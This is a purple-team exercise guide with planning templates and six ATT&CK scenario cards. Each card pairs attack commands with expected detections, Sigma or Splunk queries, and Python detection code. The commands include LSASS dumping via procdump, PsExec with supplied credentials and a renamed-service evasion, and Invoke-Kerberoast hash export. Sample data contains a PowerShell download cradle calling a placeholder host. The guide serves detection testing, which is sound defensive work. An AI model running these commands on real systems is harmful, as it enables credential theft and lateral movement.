22 pp: average improvement in ATT&CK detection rate for orgs running quarterly purple team exercises (SANS 2024)
6: copy-paste attack scenario cards covering T1059, T1003, T1021, T1558, T1074, T1547
4: metrics to track: detection rate, MTTD, alert fidelity, gap closure rate

Purple team exercises are the fastest way to find detection gaps. Unlike traditional pentests -- which deliver a report weeks after the engagement -- purple team sessions give you real-time feedback on every technique: did the alert fire, how quickly, and with enough context for an analyst to triage? This guide includes a copy-paste planning template, calendar invite, 6 attack scenario cards (each with Atomic Red Team commands, expected detections, and SIEM queries), a gap register format, and a 30-minute debrief agenda.

Why Purple Team Exercises Outperform Quarterly Pentests for Detection

A traditional pentest tells you what an attacker can do. A purple team exercise tells you what your detection stack can see. These are different questions. Organizations that run purple team exercises quarterly improve their detection rate across MITRE ATT&CK techniques by an average of 22 percentage points within 12 months, according to a 2024 SANS survey of SOC teams. The collaborative format means detection gaps are identified and remediation starts the same day, not 6 weeks after a pentest report is delivered.

Exercise Planning Template (Copy This)

Use this template to plan each exercise. Fill in the blanks and share with participants 5 business days before the session.


Purple Team Exercise Brief

Date: [DATE] [START TIME]-[END TIME]
Location/Bridge: [Zoom/Teams link or room]
Red team lead: [NAME]
Blue team lead: [NAME]
Scribe: [NAME]
Test environment: [Endpoint hostname/IP and OS; confirm isolated from production]

Threat actor focus: [e.g., "Ransomware affiliate TTPs consistent with LockBit/BlackCat initial access patterns"]

Scenarios to test (ordered by priority):

  1. [ATT&CK technique ID and name]
  2. [ATT&CK technique ID and name]
  3. [ATT&CK technique ID and name]

Success criteria: [e.g., "Alert fires in SIEM within 5 minutes of technique execution for Tier 1 techniques"]

Out of scope: [e.g., "No active directory changes, no network scanning outside test VLAN, no email-based delivery"]

Escalation contact: [NAME/PHONE for any unexpected production impact]

Debrief: Last 30 minutes of session; output is a completed gap register



Calendar Invite Template

Subject: Purple Team Exercise -- [Threat Focus] -- [DATE]

Body:
This is a scheduled purple team exercise. Red and blue team members will collaboratively 
execute and detect ATT&CK techniques to validate our detection coverage.

Agenda:
- 0:00-0:10  Intro: scope, rules, shared doc setup
- 0:10-0:55  Scenario execution (3 scenarios, ~15 min each)
- 0:55-1:25  Debrief and gap register completion
- 1:25-1:30  Next steps and remediation owners

Required: Red team lead, Blue team lead, SOC analyst (on-call for exercise window)
Optional: Detection engineer, CISO/Security manager

Shared tracking doc: [LINK]
Test endpoint: [HOSTNAME]
Slack channel: #purple-team-[DATE]

Note: This exercise is authorized and coordinated. Alerts generated during the 
exercise window ([START]-[END]) are expected. Do not escalate without checking 
with the blue team lead first.

Attack Scenario Card 1: Encoded PowerShell Execution (T1059.001)

Technique: T1059.001 -- Command and Scripting Interpreter: PowerShell
Threat actors that use this: Almost all ransomware affiliates, APT29, FIN7
Risk if undetected: Attacker can download and execute payloads, establish persistence, bypass application controls

Atomic to execute (Atomic Red Team):

# Test 1: Base64-encoded command execution
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Write-Host "Purple Team Test"'))
powershell.exe -EncodedCommand $encoded

# Test 2: Download cradle simulation (no actual download)
powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Invoke-Expression 'Write-Host PT-Test'"

Expected detection: Test 1: EDR alert on a PowerShell host launched with an encoded command; SIEM Sigma rule match on CommandLine containing -EncodedCommand or one of the abbreviations powershell.exe accepts (-enc, -ec, -e). Test 2 carries no encoded flag, so the rule below does not fire on it; cover it with a rule on -ExecutionPolicy Bypass combined with Invoke-Expression, or with Script Block Logging (Event ID 4104) if you have it enabled.

Sigma rule to validate:

title: Suspicious PowerShell Encoded Command
status: test
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - '-EncodedCommand'
      - ' -enc '
      - ' -ec '
      - ' -e '
  condition: selection
falsepositives:
  - Some administrative scripts and management agents launch encoded commands; allowlist them by ParentImage rather than disabling the rule
level: medium

Gap register entry if not detected: Sigma rule not deployed to SIEM / rule deployed but process creation logging with command line (Sysmon Event ID 1, or Security 4688 with command-line auditing) not enabled / CommandLine logged but truncated or not parsed by log shipper / rule matches only the literal -EncodedCommand and misses the abbreviated forms
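The following is an added example, not code from the original article, showing the detection logic behind the Sigma rule as a SIEM-agnostic Python check over constructed process-creation command lines: it matches every abbreviation of the flag that powershell.exe accepts (any prefix of -EncodedCommand down to -e, plus -ec; assumed to hold for pwsh.exe as well), decodes the UTF-16LE base64 payload so the analyst sees the actual command, and raises the level when the switches or decoded text contain cradle keywords. The sample events and the keyword list are constructed for the example.

```python
import base64
import re

# powershell.exe accepts any prefix of "-EncodedCommand" down to "-e", plus the
# short form "-ec" (assumption: pwsh.exe accepts the same set). A rule that only
# matches the literal "-EncodedCommand" misses "-enc", "-e", "-ec" and "/e".
_FULL = "encodedcommand"
_FLAG_ALTS = sorted([_FULL[:i] for i in range(1, len(_FULL) + 1)] + ["ec"],
                    key=len, reverse=True)
_FLAG_RE = re.compile(
    r"(?:^|\s)[-/](" + "|".join(_FLAG_ALTS) + r")\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)
_HOST_RE = re.compile(r"(?:^|[\\/])(powershell|pwsh)(?:\.exe)?$", re.IGNORECASE)

# Substrings that raise triage priority when found in the switches or the
# decoded payload. Deliberately short; extend from your own detections.
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
              "frombase64string", "-nop", "-w hidden", "-windowstyle hidden")


def decode_payload(b64):
    """-EncodedCommand carries base64 of UTF-16LE text; tolerate stripped padding."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le", errors="replace")


def encode_payload(command):
    """Inverse of decode_payload, used here only to build constructed sample events."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def _image(cmdline):
    """First token of the command line, honouring a quoted image path."""
    s = cmdline.strip()
    if s.startswith('"') and s.find('"', 1) > 0:
        return s[1:s.find('"', 1)]
    return s.split(None, 1)[0] if s else ""


def triage(cmdline):
    """Return a triage record for a process-creation CommandLine, or None when the
    line is not a PowerShell host launched with an encoded command."""
    if not _HOST_RE.search(_image(cmdline)):
        return None
    m = _FLAG_RE.search(cmdline)
    if not m:
        return None
    flag, payload = m.group(1), m.group(2)
    decoded = decode_payload(payload)
    # Search the switches and the decoded text, not the base64 blob, so a
    # coincidental "iex" inside the base64 alphabet cannot create a hit.
    haystack = (cmdline[:m.start(2)] + " " + decoded).lower()
    hits = [k for k in SUSPICIOUS if k in haystack]
    return {"flag": cmdline[m.start(1) - 1] + flag, "decoded": decoded,
            "hits": hits, "level": "high" if hits else "medium"}


# Constructed sample CommandLine values (Sysmon Event ID 1 / Security 4688):
SAMPLE_EVENTS = [
    # Scenario Card 1, Test 1, as it lands in the log
    "powershell.exe -EncodedCommand " + encode_payload('Write-Host "Purple Team Test"'),
    # Scenario Card 1, Test 2: no encoded flag, so this logic does not fire
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \"Invoke-Expression 'Write-Host PT-Test'\"",
    # Abbreviated flag plus a download cradle, modelled on commodity loaders
    "powershell -nop -w hidden -enc "
    + encode_payload("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"),
    # Not a PowerShell host: the look-alike argument must not match
    "cmd.exe /c echo -enc QQ==",
]


def run(events=SAMPLE_EVENTS):
    """Triage every event; the result list lines up with the input list."""
    return [triage(e) for e in events]


if __name__ == "__main__":
    for event, result in zip(SAMPLE_EVENTS, run()):
        print(result["level"] if result else "no-match", "|", event[:60])
```

Feed it the CommandLine field of your process-creation events; the decoded text is the context an analyst needs to close or escalate the alert without re-running the base64 by hand.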

Attack Scenario Card 2: LSASS Credential Dumping (T1003.001)

Technique: T1003.001 -- OS Credential Dumping: LSASS Memory
Threat actors that use this: LockBit, BlackCat/ALPHV, Scattered Spider, APT28
Risk if undetected: All cached domain credentials compromised, enables lateral movement via Pass-the-Hash

Atomic to execute (lab host only -- the procdump test writes an LSASS memory dump to disk):

# Atomic Red Team test 1 for T1003.001 runs procdump against lsass.exe. The .dmp it writes
# contains credential material, so use an isolated test host and run the cleanup afterwards.
Invoke-AtomicTest T1003.001 -TestNumbers 1
Invoke-AtomicTest T1003.001 -TestNumbers 1 -Cleanup

# Lower-signal handle opens, useful for seeing which GrantedAccess values your Sysmon
# config actually records (neither reads LSASS memory)
tasklist /FI "IMAGENAME eq lsass.exe" /V
Get-Process lsass | Select-Object Id, Name, Handles

Expected detection: Sysmon Event ID 10 (ProcessAccess) with TargetImage lsass.exe and a SourceImage that is not an allowlisted security product; EDR alert on procdump (or any unsigned tool) opening lsass with memory-read rights

Windows Event ID check:

Event ID 10 (Sysmon): TargetImage = C:\Windows\System32\lsass.exe
SourceImage: the process that opened the handle (procdump64.exe for the atomic)
CallTrace contains: C:\Windows\SYSTEM32\ntdll.dll+...
GrantedAccess: procdump typically requests 0x1FFFFF (PROCESS_ALL_ACCESS). The common minimal read mask is 0x1010 = PROCESS_VM_READ (0x0010) | PROCESS_QUERY_LIMITED_INFORMATION (0x1000); 0x1410 adds PROCESS_QUERY_INFORMATION (0x0400). Query-only opens (0x1000, 0x1400) are what monitoring tools produce and should not alert on their own.

SIEM query to validate detection exists (Splunk):

index=sysmon EventCode=10 TargetImage="*lsass.exe"
| stats count by SourceImage, GrantedAccess, Computer
| sort -count

Gap register entry if not detected: Sysmon not deployed / Sysmon config does not include ProcessAccess events / lsass events filtered before SIEM ingestion
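Added example (not from the original article): decoding the Event ID 10 GrantedAccess mask and applying the allowlist-then-rights logic that turns the Splunk stats above into a verdict. The sample events and the Defender allowlist globs are constructed for the example; the access-right values are the winnt.h constants.

```python
import fnmatch

# Process access rights as they appear in the Sysmon Event ID 10 GrantedAccess
# mask (winnt.h values); PROCESS_ALL_ACCESS is 0x1FFFFF on current Windows.
ACCESS_RIGHTS = [
    (0x0001, "PROCESS_TERMINATE"), (0x0002, "PROCESS_CREATE_THREAD"),
    (0x0004, "PROCESS_SET_SESSIONID"), (0x0008, "PROCESS_VM_OPERATION"),
    (0x0010, "PROCESS_VM_READ"), (0x0020, "PROCESS_VM_WRITE"),
    (0x0040, "PROCESS_DUP_HANDLE"), (0x0080, "PROCESS_CREATE_PROCESS"),
    (0x0100, "PROCESS_SET_QUOTA"), (0x0200, "PROCESS_SET_INFORMATION"),
    (0x0400, "PROCESS_QUERY_INFORMATION"), (0x0800, "PROCESS_SUSPEND_RESUME"),
    (0x1000, "PROCESS_QUERY_LIMITED_INFORMATION"),
    (0x2000, "PROCESS_SET_LIMITED_INFORMATION"),
    (0x10000, "DELETE"), (0x20000, "READ_CONTROL"), (0x40000, "WRITE_DAC"),
    (0x80000, "WRITE_OWNER"), (0x100000, "SYNCHRONIZE"),
]
# Rights that let the caller read or duplicate LSASS memory/handles. Query-only
# opens (0x1000, 0x1400) are noise from monitoring tools and should not alert.
DUMP_CAPABLE = 0x0010 | 0x0020 | 0x0008 | 0x0040 | 0x0002

# Assumed allowlist of SourceImage globs, matched case-insensitively. Tune per estate.
ALLOWLIST = [
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\programdata\microsoft\windows defender\platform\*\msmpeng.exe",
]


def decode_access(mask):
    """Expand a GrantedAccess mask into the right names it contains, low bit first."""
    return [name for bit, name in ACCESS_RIGHTS if mask & bit]


def is_allowlisted(source_image):
    src = source_image.lower()
    return any(fnmatch.fnmatchcase(src, pattern) for pattern in ALLOWLIST)


def assess(event):
    """Classify one Sysmon Event ID 10 record; None when the target is not LSASS."""
    if not event["TargetImage"].lower().endswith("\\lsass.exe"):
        return None
    mask = int(event["GrantedAccess"], 16)
    if is_allowlisted(event["SourceImage"]):
        verdict = "allowlisted"
    elif mask & DUMP_CAPABLE:
        verdict = "alert"
    else:
        verdict = "info"
    return {"verdict": verdict, "source": event["SourceImage"], "mask": mask,
            "rights": decode_access(mask), "host": event["Computer"]}


def assess_all(events):
    return [assess(e) for e in events]


def count_by_source(events):
    """Same shape as the Splunk stats in the card: count by SourceImage, GrantedAccess."""
    counts = {}
    for r in assess_all(events):
        if r is None:
            continue
        key = (r["source"], f"0x{r['mask']:X}")
        counts[key] = counts.get(key, 0) + 1
    return counts


# Constructed sample events (Sysmon Event ID 10 fields as shipped to the SIEM).
SAMPLE_EVENTS = [
    {"Computer": "PT-WS01", "SourceImage": r"C:\Tools\procdump64.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"Computer": "PT-WS01", "SourceImage": r"C:\Users\Public\svchost.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"Computer": "PT-WS01",
     "SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"Computer": "PT-WS01",
     "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"Computer": "PT-WS01", "SourceImage": r"C:\Tools\procdump64.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1FFFFF"},
]

if __name__ == "__main__":
    for r in assess_all(SAMPLE_EVENTS):
        if r:
            print(r["verdict"], r["source"], hex(r["mask"]), ", ".join(r["rights"]))
```

The order of checks matters: allowlisting by full SourceImage path comes first so a security product's 0x1FFFFF open does not page anyone, and a dump-capable mask from anything else alerts regardless of how benign the file name looks.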

Attack Scenario Card 3: PsExec Lateral Movement (T1021.002)

Technique: T1021.002 -- Remote Services: SMB/Windows Admin Shares
Threat actors that use this: Most ransomware operators for spreading across the domain after initial access
Risk if undetected: Attacker can move laterally to domain controllers and file servers undetected

Atomic to execute:

# PsExec simulation (requires PsExec downloaded to test endpoint)
# Use a test host pair -- never run against production
PsExec.exe -accepteula \\TARGET-HOST -u DOMAIN\testuser -p testpass cmd.exe /c "hostname"

# Repeat with a custom service name (-r): the service and the dropped binary are then
# no longer called PSEXESVC, which is what name-based rules key on
PsExec.exe -accepteula -r winupd \\TARGET-HOST -u DOMAIN\testuser -p testpass cmd.exe /c "hostname"

# Alternative: use Atomic Red Team
Invoke-AtomicTest T1021.002 -TestNumbers 1

Expected detection: System Event ID 7045 (new service installed) on the target with ServiceName PSEXESVC and ImagePath %SystemRoot%\PSEXESVC.exe; Security Event ID 4624 (logon type 3) on the target from the source host; Security Event ID 5145 showing PSEXESVC.exe written to the ADMIN$ share (requires the Detailed File Share audit subcategory); Sysmon Event ID 11 (file create) for C:\Windows\PSEXESVC.exe, then Event ID 1 for the PSEXESVC.exe process with cmd.exe as its child

SIEM query:

index=wineventlog EventCode=7045 ServiceName="PSEXESVC"
| stats count by ComputerName, ServiceFileName, _time

Field names depend on how your add-on renders the event (the Splunk Add-on for Windows uses Service_Name / Service_File_Name for classic-format events and ServiceName / ImagePath for XML-rendered ones), so confirm with a bare EventCode=7045 search before relying on the query.

Gap register entry if not detected: System log (7045) or Security log (4624, 5145) not forwarded from servers / Event ID 7045 not parsed by log shipper / detection keyed on the PSEXESVC name only, so PsExec run with -r (custom service and binary name) or another SMB-service tool slips past (test that variant too)
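Added example, not code from the article: a correlation over constructed 5145, 4624 and 7045 events that catches the service-install-after-ADMIN$-write pattern by file name rather than by the PSEXESVC string, so the -r variant above is caught as well. The two-minute window is an assumption to tune; field names follow the Windows XML event data rather than any particular SIEM add-on.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Field names follow the Windows XML event data: 5145 (ShareName,
# RelativeTargetName, AccessMask, IpAddress, SubjectUserName), 7045
# (ServiceName, ImagePath), 4624 (LogonType, IpAddress, TargetUserName).
FILE_WRITE_DATA = 0x2
WINDOW = timedelta(minutes=2)  # assumed: service install follows the copy within 2 min


def _ts(e):
    return datetime.fromisoformat(e["time"])


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def correlate(events):
    """Flag a service whose binary was just written over ADMIN$ from a remote
    host, regardless of the service name. Keyed on the file name, so a renamed
    PsExec (or any PsExec-style tool) is caught as long as the copy and the
    install both land in the log."""
    by_host = defaultdict(list)
    for e in events:
        by_host[e["Computer"]].append(e)
    findings = []
    for host, evs in by_host.items():
        evs.sort(key=_ts)
        writes = [e for e in evs if e["EventCode"] == 5145
                  and e["ShareName"].upper().endswith("ADMIN$")
                  and int(e["AccessMask"], 16) & FILE_WRITE_DATA
                  and e["RelativeTargetName"].lower().endswith(".exe")]
        logons = [e for e in evs if e["EventCode"] == 4624 and e["LogonType"] == 3]
        for svc in (e for e in evs if e["EventCode"] == 7045):
            name = _basename(svc["ImagePath"])
            t_svc = _ts(svc)
            copy = next((w for w in writes if _basename(w["RelativeTargetName"]) == name
                         and timedelta(0) <= t_svc - _ts(w) <= WINDOW), None)
            if copy is None:
                continue
            logon = next((l for l in logons if l["IpAddress"] == copy["IpAddress"]
                          and timedelta(0) <= t_svc - _ts(l) <= WINDOW), None)
            findings.append({
                "host": host, "service": svc["ServiceName"], "image": svc["ImagePath"],
                "source_ip": copy["IpAddress"],
                "logon_user": logon["TargetUserName"] if logon else None,
                "renamed": svc["ServiceName"].upper() != "PSEXESVC",
            })
    return findings


# Constructed events for three target hosts (times are exercise-window values).
SAMPLE_EVENTS = [
    # SRV01: stock PsExec from the test source host 10.0.0.5
    {"Computer": "SRV01", "EventCode": 4624, "time": "2025-01-15T12:00:00",
     "LogonType": 3, "IpAddress": "10.0.0.5", "TargetUserName": "testuser"},
    {"Computer": "SRV01", "EventCode": 5145, "time": "2025-01-15T12:00:01",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "PSEXESVC.exe",
     "AccessMask": "0x2", "IpAddress": "10.0.0.5", "SubjectUserName": "testuser"},
    {"Computer": "SRV01", "EventCode": 7045, "time": "2025-01-15T12:00:02",
     "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    # SRV01: a plain read of ADMIN$ that must not count as a binary drop
    {"Computer": "SRV01", "EventCode": 5145, "time": "2025-01-15T12:05:00",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "debug\\trace.log",
     "AccessMask": "0x1", "IpAddress": "10.0.0.9", "SubjectUserName": "ops"},
    # SRV02: PsExec run with -r, so neither service nor binary is called PSEXESVC
    {"Computer": "SRV02", "EventCode": 4624, "time": "2025-01-15T12:10:00",
     "LogonType": 3, "IpAddress": "10.0.0.5", "TargetUserName": "testuser"},
    {"Computer": "SRV02", "EventCode": 5145, "time": "2025-01-15T12:10:01",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "winupd.exe",
     "AccessMask": "0x12019f", "IpAddress": "10.0.0.5", "SubjectUserName": "testuser"},
    {"Computer": "SRV02", "EventCode": 7045, "time": "2025-01-15T12:10:03",
     "ServiceName": "winupd", "ImagePath": r"%SystemRoot%\winupd.exe"},
    # SRV03: local service install with no preceding ADMIN$ write
    {"Computer": "SRV03", "EventCode": 7045, "time": "2025-01-15T12:20:00",
     "ServiceName": "Sense",
     "ImagePath": r'"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"'},
]

if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f)
```

The same join expressed in your SIEM (7045 joined to a preceding 5145 write on the same host and file name, then to a type-3 logon from the writer's address) is the rule that survives the renamed-binary test in the gap register.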

Attack Scenario Card 4: Kerberoasting (T1558.003)

Technique: T1558.003 -- Steal or Forge Kerberos Tickets: Kerberoasting
Threat actors that use this: APT29, Scattered Spider, most domain-targeting ransomware affiliates
Risk if undetected: Service account password hashes extracted and cracked offline; often leads to domain admin

Atomic to execute (in lab AD environment only):

# Requires: domain-joined test host, Rubeus or PowerView (Invoke-Kerberoast)
# Atomic Red Team:
Invoke-AtomicTest T1558.003 -TestNumbers 1

# Manual (PowerView): Invoke-Kerberoast enumerates SPN accounts and requests the
# tickets; Get-DomainSPNTicket on its own needs SPNs piped in
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File kerb-tickets.txt

Expected detection: Event ID 4769 (Kerberos service ticket request) with TicketEncryptionType 0x17 (RC4-HMAC) for a user account that does not normally request service tickets, or a burst of requests for many distinct SPNs from one account and client address; Sigma rule on unusual TGS request volume. Caveats: exclude krbtgt and computer accounts (names ending in $), which legitimately generate RC4 requests, and remember that the etype the KDC picks is the weakest one the service account advertises, so AES-only accounts produce 0x12 tickets that a 0x17-only rule will never see.

Splunk query:

index=wineventlog EventCode=4769 TicketEncryptionType=0x17 Status=0x0
  ServiceName!="krbtgt" ServiceName!="*$"
| stats count, dc(ServiceName) AS distinct_spns by AccountName, IpAddress
| where count > 10 OR distinct_spns > 5
| sort -distinct_spns

Mitigation to validate: Are SPN-bearing service accounts restricted to AES? msDS-SupportedEncryptionTypes is a bitmask (0x4 RC4-HMAC, 0x8 AES128, 0x10 AES256); an account with 0x4 still set can be asked for an RC4 ticket even when it also supports AES, and an unset value falls back to the domain default, which you should check separately. Check:

Get-ADUser -Filter 'ServicePrincipalName -like "*"' -Properties ServicePrincipalName, msDS-SupportedEncryptionTypes |
  Select-Object Name, ServicePrincipalName, msDS-SupportedEncryptionTypes
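Added example (not the article's own code) covering both the 4769 detection and the mitigation check above: it groups successful RC4 ticket requests per requesting account and client address and flags bursts across many distinct SPNs, skipping krbtgt and computer accounts, and it decodes msDS-SupportedEncryptionTypes to list accounts that can still be asked for an RC4 or DES ticket. All events and account records are constructed; the window and the distinct-SPN threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# msDS-SupportedEncryptionTypes bit flags (MS-KILE 2.2.7).
ENC_TYPES = [(0x1, "DES-CBC-CRC"), (0x2, "DES-CBC-MD5"), (0x4, "RC4-HMAC"),
             (0x8, "AES128-CTS-HMAC-SHA1-96"), (0x10, "AES256-CTS-HMAC-SHA1-96")]
RC4_OR_DES = 0x7


def decode_enctypes(value):
    """Names for the bits set in msDS-SupportedEncryptionTypes; None/0 = attribute unset."""
    if not value:
        return ["<unset: domain default applies>"]
    return [name for bit, name in ENC_TYPES if value & bit]


def roastable(value):
    """True if the KDC may still issue an RC4/DES ticket for the account. The
    requester picks the weakest etype the account advertises, so AES bits do
    not help while 0x4 is set. Unset is treated as exposed until the domain
    default has been verified."""
    return value is None or value == 0 or bool(value & RC4_OR_DES)


def audit_accounts(accounts):
    """Return SPN-bearing accounts that can still be Kerberoasted with RC4/DES."""
    return [a["name"] for a in accounts if a["spn"] and roastable(a["enctypes"])]


def _ts(e):
    return datetime.fromisoformat(e["time"])


def kerberoast_candidates(events, window=timedelta(minutes=10), min_services=3):
    """Group successful RC4 (0x17) TGS requests by (requesting account, client IP)
    and flag a pair that asked for >= min_services distinct SPNs within window.
    krbtgt and computer accounts ($) are skipped: they are normal TGS targets."""
    per_key = defaultdict(list)
    for e in events:
        if e["EventCode"] != 4769 or e["Status"] != "0x0":
            continue
        if e["TicketEncryptionType"].lower() != "0x17":
            continue
        svc = e["ServiceName"]
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        per_key[(e["TargetUserName"], e["IpAddress"])].append((_ts(e), svc))
    findings = []
    for (account, ip), reqs in per_key.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            in_window = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(in_window) >= min_services:
                findings.append({"account": account, "ip": ip,
                                 "services": sorted(in_window), "start": t0})
                break
    return findings


def _tgs(time, user, ip, svc, etype="0x17", status="0x0"):
    return {"EventCode": 4769, "time": time, "TargetUserName": user, "IpAddress": ip,
            "ServiceName": svc, "TicketEncryptionType": etype, "Status": status}


# Constructed 4769 events (field names follow the Windows XML event data).
SAMPLE_4769 = [
    _tgs("2025-01-15T09:00:00", "jdoe", "10.0.0.5", "sql_svc"),
    _tgs("2025-01-15T09:00:01", "jdoe", "10.0.0.5", "http_svc"),
    _tgs("2025-01-15T09:00:01", "jdoe", "10.0.0.5", "mssql2"),
    _tgs("2025-01-15T09:00:02", "jdoe", "10.0.0.5", "backup_svc"),
    _tgs("2025-01-15T09:00:02", "jdoe", "10.0.0.5", "krbtgt"),      # skipped
    _tgs("2025-01-15T09:00:03", "jdoe", "10.0.0.5", "WS01$"),       # skipped
    _tgs("2025-01-15T09:01:00", "asmith", "10.0.0.9", "sql_svc"),   # one RC4 ticket
    _tgs("2025-01-15T09:01:05", "asmith", "10.0.0.9", "http_svc", etype="0x12"),
    _tgs("2025-01-15T09:01:06", "asmith", "10.0.0.9", "backup_svc", status="0x7"),  # failed
]

# Constructed account records, shaped like the Get-ADUser output above.
SAMPLE_ACCOUNTS = [
    {"name": "sql_svc", "spn": ["MSSQLSvc/sql01:1433"], "enctypes": 0x1c},  # RC4+AES
    {"name": "http_svc", "spn": ["HTTP/web01"], "enctypes": 0x18},          # AES only
    {"name": "legacy_svc", "spn": ["CIFS/fs01"], "enctypes": None},         # unset
    {"name": "jdoe", "spn": [], "enctypes": None},                          # no SPN
]

if __name__ == "__main__":
    print(kerberoast_candidates(SAMPLE_4769))
    print(audit_accounts(SAMPLE_ACCOUNTS))
```

Run the account audit before the exercise: if every SPN account is AES-only, the 0x17 rule can never fire on the test and you should be watching for the 0x12 burst instead.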

Attack Scenario Card 5: Data Staged for Exfiltration (T1074.001)

Technique: T1074.001 -- Data Staged: Local Data Staging
Threat actors that use this: All ransomware affiliates conducting double-extortion; APT groups pre-exfiltration
Risk if undetected: Attacker can compress and exfiltrate sensitive files undetected; provides leverage for extortion

Atomic to execute:

# Create test staging directory and copy sample files into it
# (seed C:\Users\Public\Documents with a few non-sensitive test files first if it is empty)
New-Item -Path C:\Temp\PT-Staging -ItemType Directory -Force
Copy-Item C:\Users\Public\Documents\* C:\Temp\PT-Staging\ -Recurse

# Compress with native PowerShell (simulates attacker behavior)
Compress-Archive -Path C:\Temp\PT-Staging -DestinationPath C:\Temp\PT-Data.zip

# Simulate 7zip compression (common attacker tool)
# 7z.exe a C:\Temp\PT-Data.7z C:\Temp\PT-Staging\

# Cleanup after test
Remove-Item C:\Temp\PT-Staging -Recurse
Remove-Item C:\Temp\PT-Data.zip

Expected detection: Sysmon Event ID 11 (file created) for .zip/.7z/.rar in unusual directories (Temp, ProgramData); EDR behavioral alert on large file compression activity; DLP alert on sensitive file pattern matches in archive

Gap register entry if not detected: No file creation monitoring for archive types / DLP not scanning compressed files / Staging in allowed directories (Downloads) that are excluded from monitoring

Attack Scenario Card 6: New Persistence via Registry Run Key (T1547.001)

Technique: T1547.001 -- Boot or Logon Autostart Execution: Registry Run Keys
Threat actors that use this: Common persistence mechanism across commodity malware, RATs, and ransomware droppers
Risk if undetected: Attacker payload survives reboots; can maintain access indefinitely

Atomic to execute:

# Add a test registry run key (the cleanup step below removes it; nothing runs at logon
# because C:\Temp\PT-Test.exe does not exist)
Reg Add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" `
  /v "PurpleTeamTest" `
  /t REG_SZ `
  /d "C:\Temp\PT-Test.exe" `
  /f

# Verify it was created
Get-ItemProperty "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name PurpleTeamTest

# Cleanup immediately
Remove-ItemProperty "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name PurpleTeamTest

Expected detection: Sysmon Event ID 13 (RegistryEvent -- value set) on HKCU/HKLM Run keys; EDR alert on new autorun entry pointing to temp directory or unsigned binary

SIEM query (known_good_installers.csv is an allowlist lookup of installer and agent Image paths that you maintain):

index=sysmon EventCode=13
  TargetObject="*\\CurrentVersion\\Run*"
| search NOT [| inputlookup known_good_installers.csv | fields Image]
| stats count by Image, TargetObject, Details, Computer

Gap Register Template

Fill this in during the debrief. Export to CSV or paste into Jira as a parent epic with sub-tasks.

Scenario | Technique | Execution Result | Alert Fired? | Time to Alert | Alert Quality | Root Cause of Gap | Detection Owner | Target Fix Date | Status
Encoded PowerShell | T1059.001 | Success | No | N/A | None | Command-line auditing (4688 / Sysmon Event ID 1) not applied to server OU | [NAME] | [DATE] | Open
LSASS Access | T1003.001 | Success | Yes | 4 min | Low -- missing host context | Log shipper drops SourceImage and SourceUser from Event ID 10 | [NAME] | [DATE] | Open
PsExec Lateral | T1021.002 | Success | Yes | 2 min | High | None -- working as expected | N/A | N/A | Closed

Alert Quality scoring:

  • High: Alert fired, analyst could triage without additional investigation
  • Medium: Alert fired but missing key fields (username, host, parent process)
  • Low: Alert fired but would likely be noise / analyst would close it
  • None: No alert

Debrief Agenda (Last 30 Minutes)

Run this agenda at the end of every purple team session:

0:00-0:05: Results summary
Scribe reads out the gap register: X of Y techniques detected, Z gaps identified.

0:05-0:15: Root cause discussion for each gap
For each missed detection, answer: was this a logging gap, a rule gap, or a tuning gap? Logging gap = the event isn't reaching the SIEM. Rule gap = no rule exists. Tuning gap = rule exists but was too noisy and disabled.

0:15-0:22: Remediation owners and dates
For each gap, assign: detection engineer owner, target deployment date, and how to verify the fix (re-test date).

0:22-0:28: What worked well
Identify detections that fired with high fidelity. These are candidates to use as templates for similar techniques.

0:28-0:30: Next exercise scope
Based on today's results, what threat actor TTPs should the next exercise focus on? Record this as the input to the next planning template.

Scaling Purple Team Exercises Across the Organization

Once you've run three or four exercises and the team is comfortable, scale the program:

Security champions model: Train engineers in each product team to run Atomic Red Team atomics against their own services quarterly. They report results back to the detection team. This gets you 10x the coverage without 10x the security team headcount.

Automated BAS between exercises: Use a breach and attack simulation (BAS) platform such as Cymulate, AttackIQ, or SafeBreach to run the same technique library on a weekly schedule automatically. This catches detection regressions introduced by SIEM rule changes or log pipeline updates.

